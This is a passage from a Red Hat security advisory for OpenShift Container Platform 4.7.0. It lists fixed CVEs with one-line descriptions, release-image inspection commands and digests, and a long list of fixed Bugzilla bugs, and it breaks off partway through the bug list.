CVE-2020-8177 CVE-2020-8492 CVE-2020-8563
CVE-2020-8566 CVE-2020-8619 CVE-2020-8622
CVE-2020-8623 CVE-2020-8624 CVE-2020-8647
CVE-2020-8648 CVE-2020-8649 CVE-2020-9327
CVE-2020-9802 CVE-2020-9803 CVE-2020-9805
CVE-2020-9806 CVE-2020-9807 CVE-2020-9843
CVE-2020-9850 CVE-2020-9862 CVE-2020-9893
CVE-2020-9894 CVE-2020-9895 CVE-2020-9915
CVE-2020-9925 CVE-2020-10018 CVE-2020-10029
CVE-2020-10732 CVE-2020-10749 CVE-2020-10751
CVE-2020-10763 CVE-2020-10773 CVE-2020-10774
CVE-2020-10942 CVE-2020-11565 CVE-2020-11668
CVE-2020-11793 CVE-2020-12465 CVE-2020-12655
CVE-2020-12659 CVE-2020-12770 CVE-2020-12826
CVE-2020-13249 CVE-2020-13630 CVE-2020-13631
CVE-2020-13632 CVE-2020-14019 CVE-2020-14040
CVE-2020-14381 CVE-2020-14382 CVE-2020-14391
CVE-2020-14422 CVE-2020-15157 CVE-2020-15503
CVE-2020-15862 CVE-2020-15999 CVE-2020-16166
CVE-2020-24490 CVE-2020-24659 CVE-2020-25211
CVE-2020-25641 CVE-2020-25658 CVE-2020-25661
CVE-2020-25662 CVE-2020-25681 CVE-2020-25682
CVE-2020-25683 CVE-2020-25684 CVE-2020-25685
CVE-2020-25686 CVE-2020-25687 CVE-2020-25694
CVE-2020-25696 CVE-2020-26160 CVE-2020-27813
CVE-2020-27846 CVE-2020-28362 CVE-2020-29652
CVE-2021-2007 CVE-2021-3121
=====================================================================
1. Summary:
Red Hat OpenShift Container Platform release 4.7.0 is now available.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container
Platform 4.7.0. See the following advisory for the RPM packages for this
release:
https://access.redhat.com/errata/RHSA-2020:5634
Space precludes documenting all of the container images in this advisory.
See the following Release Notes documentation, which will be updated
shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
You may download the oc tool and use it to inspect release image metadata
as follows:
(For x86_64 architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64
The image digest is
sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70
(For s390x architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-s390x
The image digest is
sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d
(For ppc64le architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le
The image digest is
sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6
All OpenShift Container Platform 4.7 users are advised to upgrade to these
updated packages and images when they are available in the appropriate
release channel. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -between-minor.html#understanding-upgrade-channels_updating-cluster-between
- -minor.
Security Fix(es):
* crewjam/saml: authentication bypass in saml authentication
(CVE-2020-27846)
* golang: crypto/ssh: crafted authentication request can lead to nil
pointer dereference (CVE-2020-29652)
* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index
validation (CVE-2021-3121)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* kubernetes: Secret leaks in kube-controller-manager when using vSphere
Provider (CVE-2020-8563)
* containernetworking/plugins: IPv6 router advertisements allow for MitM
attacks on IPv4 clusters (CVE-2020-10749)
* heketi: gluster-block volume password details available in logs
(CVE-2020-10763)
* golang.org/x/text: possibility to trigger an infinite loop in
encoding/unicode could lead to crash (CVE-2020-14040)
* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)
* golang-github-gorilla-websocket: integer overflow leads to denial of
service (CVE-2020-27813)
* golang: math/big: panic during recursive division of very large numbers
(CVE-2020-28362)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
For OpenShift Container Platform 4.7, see the following documentation,
which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -cli.html.
4. Bugs fixed (https://bugzilla.redhat.com/):
1620608 - Restoring deployment config with history leads to weird state
1752220 - [OVN] Network Policy fails to work when project label gets overwritten
1756096 - Local storage operator should implement must-gather spec
1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs
1768255 - installer reports 100% complete but failing components
1770017 - Init containers restart when the exited container is removed from node.
1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating
1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset
1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale
1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands
1784298 - "Displaying with reduced resolution due to large dataset." would show under some conditions
1785399 - Under condition of heavy pod creation, creation fails with 'error reserving pod name ...: name is reserved"
1797766 - Resource Requirements" specDescriptor fields - CPU and Memory injects empty string YAML editor
1801089 - [OVN] Installation failed and monitoring pod not created due to some network error.
1805025 - [OSP] Machine status doesn't become "Failed" when creating a machine with invalid image
1805639 - Machine status should be "Failed" when creating a machine with invalid machine configuration
1806000 - CRI-O failing with: error reserving ctr name
1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be
1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be
1810438 - Installation logs are not gathered from OCP nodes
1812085 - kubernetes-networking-namespace-pods dashboard doesn't exist
1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation
1813012 - EtcdDiscoveryDomain no longer needed
1813949 - openshift-install doesn't use env variables for OS_* for some of API endpoints
1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use
1819053 - loading OpenAPI spec for "v1beta1.metrics.k8s.io" failed with: OpenAPI spec does not exist
1819457 - Package Server is in 'Cannot update' status despite properly working
1820141 - [RFE] deploy qemu-quest-agent on the nodes
1822744 - OCS Installation CI test flaking
1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario
1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool
1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file
1829723 - User workload monitoring alerts fire out of the box
1832968 - oc adm catalog mirror does not mirror the index image itself
1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN
1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters
1834995 - olmFull suite always fails once th suite is run on the same cluster
1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz
1837953 - Replacing masters doesn't work for ovn-kubernetes 4.4
1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks
1838751 - [oVirt][Tracker] Re-enable skipped network tests
1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups
1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed
1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP
1841119 - Get rid of config patches and pass flags directly to kcm
1841175 - When an Install Plan gets deleted, OLM does not create a new one
1841381 - Issue with memoryMB validation
1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option
1844727 - Etcd container leaves grep and lsof zombie processes
1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs
1847074 - Filter bar layout issues at some screen widths on search page
1848358 - CRDs with preserveUnknownFields:true don't reflect in status that they are non-structural
1849543 - [4.5]kubeletconfig's description will show multiple lines for finalizers when upgrade from 4.4.8->4.5
1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service
1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard
1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing
1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD
1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service
1853115 - the restriction of --cloud option should be shown in help text.
1853116 - `--to` option does not work with `--credentials-requests` flag.
1853352 - [v2v][UI] Storage Class fields Should Not be empty in VM disks view
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1854567 - "Installed Operators" list showing "duplicated" entries during installation
1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present
1855351 - Inconsistent Installer reactions to Ctrl-C during user input process
1855408 - OVN cluster unstable after running minimal scale test
1856351 - Build page should show metrics for when the build ran, not the last 30 minutes
1856354 - New APIServices missing from OpenAPI definitions
1857446 - ARO/Azure: excessive pod memory allocation causes node lockup
1857877 - Operator upgrades can delete existing CSV before completion
1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed
1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created
1860136 - default ingress does not propagate annotations to route object on update
1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as "Failed"
1860518 - unable to stop a crio pod
1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller
1862430 - LSO: PV creation lock should not be acquired in a loop
1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group.
1862608 - Virtual media does not work on hosts using BIOS, only UEFI
1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network
1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff
1865839 - rpm-ostree fails with "System transaction in progress" when moving to kernel-rt
1866043 - Configurable table column headers can be illegible
1866087 - Examining agones helm chart resources results in "Oh no!"
1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info
1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement
1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity
1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there’s no indication on which labels offer tooltip/help
1866340 - [RHOCS Usability Study][Dashboard] It was not clear why “No persistent storage alerts” was prominently displayed
1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations
1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le & s390x
1866482 - Few errors are seen when oc adm must-gather is run
1866605 - No metadata.generation set for build and buildconfig objects
1866873 - MCDDrainError "Drain failed on , updates may be blocked" missing rendered node name
1866901 - Deployment strategy for BMO allows multiple pods to run at the same time
1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure.
1867165 - Cannot assign static address to baremetal install bootstrap vm
1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig
1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS
1867477 - HPA monitoring cpu utilization fails for deployments which have init containers
1867518 - [oc] oc should not print so many goroutines when ANY command fails
1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster
1867965 - OpenShift Console Deployment Edit overwrites deployment yaml
1868004 - opm index add appears to produce image with wrong registry server binary
1868065 - oc -o jsonpath prints possible warning / bug "Unable to decode server response into a Table"
1868104 - Baremetal actuator should not delete Machine objects
1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead
1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters
1868527 - OpenShift Storage using VMWare vSAN receives error "Failed to add disk 'scsi0:2'" when mounted pod is created on separate node
1868645 - After a disaster recovery pods a stuck in "NodeAffinity" state and not running
1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation
1868765 - [vsphere][ci] could not reserve an IP address: no available addresses
1868770 - catalogSource named "redhat-operators" deleted in a disconnected cluster
1868976 - Prometheus error opening query log file on EBS backed PVC
1869293 - The configmap name looks confusing in aide-ds pod logs
1869606 - crio's failing to delete a network namespace
1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes
1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance]
1870373 - Ingress Operator reports available when DNS fails to provision
1870467 - D/DC Part of Helm / Operator Backed should not have HPA
1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json
1870800 - [4.6] Managed Column not appearing on Pods Details page
1871170 - e2e tests are needed to validate the functionality of the etcdctl container
1872001 - EtcdDiscoveryDomain no longer needed
1872095 - content are expanded to the whole line when only one column in table on Resource Details page
1872124 - Could not choose device type as "disk" or "part" when create localvolumeset from web console
1872128 - Can't run container with hostPort on ipv6 cluster
1872166 - 'Silences' link redirects to unexpected 'Alerts' view after creating a silence in the Developer perspective
1872251 - [aws-ebs-csi-driver] Verify job in CI doesn't check for vendor dir sanity
1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them
1872821 - [DOC] Typo in Ansible Operator Tutorial
1872907 - Fail to create CR from generated Helm Base Operator
1872923 - Click "Cancel" button on the "initialization-resource" creation form page should send users to the "Operator details" page instead of "Install Operator" page (previous page)
1873007 - [downstream] failed to read config when running the operator-sdk in the home path
1873030 - Subscriptions without any candidate operators should cause resolution to fail
1873043 - Bump to latest available 1.19.x k8s
1873114 - Nodes goes into NotReady state (VMware)
1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem
1873305 - Failed to power on /inspect node when using Redfish protocol
1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information
1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: “?” button/icon in Developer Console ->Navigation
1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working
1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name > 63 characters
1874057 - Pod stuck in CreateContainerError - error msg="container_linux.go:348: starting container process caused \"chdir to cwd (\\\"/mount-point\\\") set in config.json failed: permission denied\""
1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver
1874192 - [RFE] "Create Backing Store" page doesn't allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider
1874240 - [vsphere] unable to deprovision - Runtime error list attached objects
1874248 - Include validation for vcenter host in the install-config
1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6
1874583 - apiserver tries and fails to log an event when shutting down
1874584 - add retry for etcd errors in kube-apiserver
1874638 - Missing logging for nbctl daemon
1874736 - [downstream] no version info for the helm-operator
1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution
1874968 - Accessibility: The project selection drop down is a keyboard trap
1875247 - Dependency resolution error "found more than one head for channel" is unhelpful for users
1875516 - disabled scheduling is easy to miss in node page of OCP console
1875598 - machine status is Running for a master node which has been terminated from the console
1875806 - When creating a service of type "LoadBalancer" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes.
1876166 - need to be able to disable kube-apiserver connectivity checks
1876469 - Invalid doc link on yaml template schema description
1876701 - podCount specDescriptor change doesn't take effect on operand details page
1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt
1876935 - AWS volume snapshot is not deleted after the cluster is destroyed
1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted
1877105 - add redfish to enabled_bios_interfaces
1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted`
1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown
1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only 'rootDevices'
1877681 - Manually created PV can not be used
1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53
1877740 - RHCOS unable to get ip address during first boot
1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5
1877919 - panic in multus-admission-controller
1877924 - Cannot set BIOS config using Redfish with Dell iDracs
1878022 - Met imagestreamimport error when import the whole image repository
1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default "Filesystem Name" instead of providing a textbox, & the name should be validated
1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status
1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM
1878766 - CPU consumption on nodes is higher than the CPU count of the node.
1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus.
1878823 - "oc adm release mirror" generating incomplete imageContentSources when using "--to" and "--to-release-image"
1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode
1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used
1878953 - RBAC error shows when normal user access pvc upload page
1878956 - `oc api-resources` does not include API version
1878972 - oc adm release mirror removes the architecture information
1879013 - [RFE]Improve CD-ROM interface selection
1879056 - UI should allow to change or unset the evictionStrategy
1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled
1879094 - RHCOS dhcp kernel parameters not working as expected
1879099 - Extra reboot during 4.5 -> 4.6 upgrade
1879244 - Error adding container to network "ipvlan-host-local": "master" field is required
1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder
1879282 - Update OLM references to point to the OLM's new doc site
1879283 - panic after nil pointer dereference in pkg/daemon/update.go
1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests
1879419 - [RFE]Improve boot source description for 'Container' and ‘URL’
1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted.
1879565 - IPv6 installation fails on node-valid-hostname
1879777 - Overlapping, divergent openshift-machine-api namespace manifests
1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with 'Basic', skipping basic authentication in Log message in thanos-querier pod the oauth-proxy
1879930 - Annotations shouldn't be removed during object reconciliation
1879976 - No other channel visible from console
1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc.
1880148 - dns daemonset rolls out slowly in large clusters
1880161 - Actuator Update calls should have fixed retry time
1880259 - additional network + OVN network installation failed
1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as "Failed"
1880410 - Convert Pipeline Visualization node to SVG
1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn
1880443 - broken machine pool management on OpenStack
1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s.
1880473 - IBM Cloudpak operators installation stuck "UpgradePending" with InstallPlan status updates failing due to size limitation
1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables)
1880785 - CredentialsRequest missing description in `oc explain`
1880787 - No description for Provisioning CRD for `oc explain`
1880902 - need dnsPlocy set in crd ingresscontrollers
1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster
1881027 - Cluster installation fails at with error : the container name \"assisted-installer\" is already in use
1881046 - [OSP] openstack-cinder-csi-driver-operator doesn't contain required manifests and assets
1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node
1881268 - Image uploading failed but wizard claim the source is available
1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration
1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup
1881881 - unable to specify target port manually resulting in application not reachable
1881898 - misalignment of sub-title in quick start headers
1882022 - [vsphere][ipi] directory path is incomplete, terraform can't find the cluster
1882057 - Not able to select access modes for snapshot and clone
1882140 - No description for spec.kubeletConfig
1882176 - Master recovery instructions don't handle IP change well
1882191 - Installation fails against external resources which lack DNS Subject Alternative Name
1882209 - [ BateMetal IPI ] local coredns resolution not working
1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from "Too large resource version"
1882268 - [e2e][automation]Add Integration Test for Snapshots
1882361 - Retrieve and expose the latest report for the cluster
1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use
1882556 - git:// protocol in origin tests is not currently proxied
1882569 - CNO: Replacing masters doesn't work for ovn-kubernetes 4.4
1882608 - Spot instance not getting created on AzureGovCloud
1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance
1882649 - IPI installer labels all images it uploads into glance as qcow2
1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic
1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page
1882660 - Operators in a namespace should be installed together when approve one
1882667 - [ovn] br-ex Link not found when scale up RHEL worker
1882723 - [vsphere]Suggested mimimum value for providerspec not working
1882730 - z systems not reporting correct core count in recording rule
1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully
1882781 - nameserver= option to dracut creates extra NM connection profile
1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined
1882844 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere
1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability
1883388 - Bare Metal Hosts Details page doesn't show Mainitenance and Power On/Off status
1883422 - operator-sdk cleanup fail after installing operator with "run bundle" without installmode and og with ownnamespace
1883425 - Gather top installplans and their count
1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2
1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]
1883538 - must gather report "cannot file manila/aws ebs/ovirt csi related namespaces and objects" error
1883560 - operator-registry image needs clean up in /tmp
1883563 - Creating duplicate namespace from create namespace modal breaks the UI
1883614 - [OCP 4.6] [UI] UI should not describe power cycle as "graceful"
1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate
1883660 - e2e-metal-ipi CI job consistently failing on 4.4
1883765 - [user workload monitoring] improve latency of Thanos sidecar when streaming read requests
1883766 - [e2e][automation] Adjust tests for UI changes
1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations
1883773 - opm alpha bundle build fails on win10 home
1883790 - revert "force cert rotation every couple days for development" in 4.7
1883803 - node pull secret feature is not working as expected
1883836 - Jenkins imagestream ubi8 and nodejs12 update
1883847 - The UI does not show checkbox for enable encryption at rest for OCS
1883853 - go list -m all does not work
1883905 - race condition in opm index add --overwrite-latest
1883946 - Understand why trident CSI pods are getting deleted by OCP
1884035 - Pods are illegally transitioning back to pending
1884041 - e2e should provide error info when minimum number of pods aren't ready in kube-system namespace
1884131 - oauth-proxy repository should run tests
1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied
1884221 - IO becomes unhealthy due to a file change
1884258 - Node network alerts should work on ratio rather than absolute values
1884270 - Git clone does not support SCP-style ssh locations
1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout
1884435 - vsphere - loopback is randomly not being added to resolver
1884565 - oauth-proxy crashes on invalid usage
1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy
1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users
1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment
1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu.
1884632 - Adding BYOK disk encryption through DES
1884654 - Utilization of a VMI is not populated
1884655 - KeyError on self._existing_vifs[port_id]
1884664 - Operator install page shows "installing..." instead of going to install status page
1884672 - Failed to inspect hardware. Reason: unable to start inspection: 'idrac'
1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure
1884724 - Quick Start: Serverless quickstart doesn't match Operator install steps
1884739 - Node process segfaulted
1884824 - Update baremetal-operator libraries to k8s 1.19
1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping
1885138 - Wrong detection of pending state in VM details
1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2
1885165 - NoRunningOvnMaster alert falsely triggered
1885170 - Nil pointer when verifying images
1885173 - [e2e][automation] Add test for next run configuration feature
1885179 - oc image append fails on push (uploading a new layer)
1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig
1885218 - [e2e][automation] Add virtctl to gating script
1885223 - Sync with upstream (fix panicking cluster-capacity binary)
1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2
1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2
1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2
1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2
1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2
1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2
1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI
1885315 - unit tests fail on slow disks
1885319 - Remove redundant use of group and kind of DataVolumeTemplate
1885343 - Console doesn't load in iOS Safari when using self-signed certificates
1885344 - 4.7 upgrade - dummy bug for 1880591
1885358 - add p&f configuration to protect openshift traffic
1885365 - MCO does not respect the install section of systemd files when enabling
1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating
1885398 - CSV with only Webhook conversion can't be installed
1885403 - Some OLM events hide the underlying errors
1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case
1885425 - opm index add cannot batch add multiple bundles that use skips
1885543 - node tuning operator builds and installs an unsigned RPM
1885644 - Panic output due to timeouts in openshift-apiserver
1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU < 30 || totalMemory < 72 GiB for initial deployment
1885702 - Cypress: Fix 'aria-hidden-focus' accesibility violations
1885706 - Cypress: Fix 'link-name' accesibility violation
1885761 - DNS fails to resolve in some pods
1885856 - Missing registry v1 protocol usage metric on telemetry
1885864 - Stalld service crashed under the worker node
1885930 - [release 4.7] Collect ServiceAccount statistics
1885940 - kuryr/demo image ping not working
1886007 - upgrade test with service type load balancer will never work
1886022 - Move range allocations to CRD's
1886028 - [BM][IPI] Failed to delete node after scale down
1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas
1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd
1886154 - System roles are not present while trying to create new role binding through web console
1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5->4.6 causes broadcast storm
1886168 - Remove Terminal Option for Windows Nodes
1886200 - greenwave / CVP is failing on bundle validations, cannot stage push
1886229 - Multipath support for RHCOS sysroot
1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage
1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status
1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL
1886397 - Move object-enum to console-shared
1886423 - New Affinities don't contain ID until saving
1886435 - Azure UPI uses deprecated command 'group deployment'
1886449 - p&f: add configuration to protect oauth server traffic
1886452 - layout options doesn't gets selected style on click i.e grey background
1886462 - IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected
1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest
1886524 - Change default terminal command for Windows Pods
1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution
1886600 - panic: assignment to entry in nil map
1886620 - Application behind service load balancer with PDB is not disrupted
1886627 - Kube-apiserver pods restarting/reinitializing periodically
1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider
1886636 - Panic in machine-config-operator
1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer.
1886751 - Gather MachineConfigPools
1886766 - PVC dropdown has 'Persistent Volume' Label
1886834 - ovn-cert is mandatory in both master and node daemonsets
1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState
1886861 - ordered-values.yaml not honored if values.schema.json provided
1886871 - Neutron ports created for hostNetworking pods
1886890 - Overwrite jenkins-agent-base imagestream
1886900 - Cluster-version operator fills logs with "Manifest: ..." spew
1886922 - [sig-network] pods should successfully create sandboxes by getting pod
1886973 - Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console
1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO
1887010 - Imagepruner met error "Job has reached the specified backoff limit" which causes image registry degraded
1887026 - FC volume attach fails with “no fc disk found” error on OCP 4.6 PowerVM cluster
1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6
1887046 - Event for LSO need update to avoid confusion
1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image
1887375 - User should be able to specify volumeMode when creating pvc from web-console
1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console
1887392 - openshift-apiserver: delegated authn/z should have ttl > metrics/healthz/readyz/openapi interval
1887428 - oauth-apiserver service should be monitored by prometheus
1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting "degraded: False"
1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data
1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes
1887465 - Deleted project is still referenced
1887472 - unable to edit application group for KSVC via gestures (shift+Drag)
1887488 - OCP 4.6: Topology Manager OpenShift E2E test fails: gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface
